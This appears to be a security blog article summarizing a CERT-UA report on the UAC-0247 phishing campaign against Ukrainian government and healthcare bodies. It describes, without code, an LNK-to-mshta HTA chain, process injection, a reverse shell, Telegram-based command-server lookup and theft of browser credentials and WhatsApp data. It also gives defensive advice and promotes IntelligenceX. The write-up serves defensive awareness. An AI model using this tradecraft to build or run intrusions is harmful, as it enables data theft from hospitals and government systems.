Ukraine’s national cyber defense authority, CERT-UA, has revealed details of a coordinated cyber operation that targeted government institutions and healthcare organizations, including clinics and emergency response units. The campaign, tracked as UAC-0247, focuses on deploying malware capable of extracting sensitive data from Chromium-based browsers and WhatsApp sessions.
The activity was observed during March and April 2026. While the group behind the operation has not yet been officially identified, the techniques used suggest a well-organized threat actor with a clear objective: gaining access to sensitive information and maintaining persistent control over compromised systems.
How the Attack Begins
The entry point for the attack is a carefully crafted phishing email. These emails are disguised as humanitarian aid proposals, a tactic likely chosen to exploit trust and urgency among recipients.
The message contains a link that directs victims to either a legitimate website that has been compromised or a fake page created using AI-generated content. In cases where legitimate websites are used, attackers exploit cross-site scripting vulnerabilities to inject malicious elements. Regardless of the method, the outcome remains the same — convincing the user to download a malicious file.
From Download to Execution
Once the victim interacts with the malicious page, they are prompted to download a Windows shortcut file (LNK). Opening this file triggers the execution of a remote HTML Application (HTA) via the built-in Windows tool “mshta.exe.”
The HTA file is designed to distract the user by displaying a decoy interface while it quietly initiates the next stage of the attack. Behind the scenes, it downloads a binary payload that injects malicious code into legitimate system processes such as runtimeBroker.exe. This approach helps the malware remain hidden while carrying out its operations.
CERT-UA has also identified more advanced attack chains where a two-stage loader is used. The second stage is implemented in a custom executable format that supports structured code execution and dynamic imports. To further complicate analysis, the final payload is compressed and encrypted.
Establishing Control Over the System
A key component of the attack is the deployment of a reverse shell tool referred to as RAVENSHELL. This tool creates a connection between the infected machine and a remote command server, allowing attackers to execute commands using standard utilities like cmd.exe.
Alongside this, the attackers deploy a malware family known as AGINGFLY and a PowerShell-based component called SILENTLOOP. AGINGFLY is developed in C# and provides extensive control over the infected system. It communicates with its command server via WebSockets and supports a wide range of actions, including command execution, file transfers, and keylogging.
SILENTLOOP enhances the reliability of the attack by dynamically retrieving command-and-control server addresses from Telegram channels. It also includes fallback mechanisms to ensure communication persists even if primary channels are disrupted.
Data Theft and Lateral Movement
The primary objective of the campaign is data exfiltration. Attackers focus on extracting credentials, browser data, and communication records. To achieve this, they deploy tools designed to bypass browser encryption and retrieve stored passwords and cookies from Chromium-based applications.
They also use specialized utilities to access WhatsApp Web data, allowing them to capture user conversations. Additional tools enable network scanning, tunneling, and lateral movement within compromised environments, increasing the overall impact of the intrusion.
In some cases, cryptocurrency mining tools have also been observed, indicating that financial gain may be an additional motive behind the campaign.
There is also evidence suggesting that individuals connected to Ukraine’s defense sector have been targeted. In such instances, malicious files were distributed through messaging platforms, further expanding the reach of the campaign.
Challenges in Detection
This campaign is particularly difficult to detect due to its use of legitimate system tools and multi-stage execution techniques. By blending malicious activity with normal system behavior, attackers are able to bypass traditional security defenses.
This is where platforms like IntelligenceX become valuable. IntelligenceX provides visibility into exposed assets, malicious infrastructure, and threat patterns, helping organizations identify risks before they escalate into full-scale incidents.
By leveraging IntelligenceX, security teams can monitor suspicious domains, analyze attacker infrastructure, and correlate intelligence across multiple data sources. This proactive approach is essential for detecting advanced threats that rely on stealth and persistence.
Defensive Recommendations
To mitigate the risks associated with campaigns like UAC-0247, organizations should restrict the execution of file types commonly used in attacks, such as LNK, HTA, and JavaScript files. Limiting the use of built-in utilities like mshta.exe, PowerShell, and wscript.exe can also reduce the attack surface.
In addition, organizations should invest in user awareness training to reduce the effectiveness of phishing attempts and implement strong monitoring systems to detect unusual activity.
Final Thoughts
The UAC-0247 campaign highlights the growing sophistication of cyber threats targeting critical sectors. By combining social engineering with advanced malware techniques, attackers are able to infiltrate systems and extract sensitive information with minimal detection.
To stay ahead of these threats, organizations must adopt a proactive and intelligence-driven security strategy. Leveraging tools like IntelligenceX, along with strong internal controls and continuous monitoring, can significantly improve an organization’s ability to detect and respond to evolving cyber risks.
Top comments (0)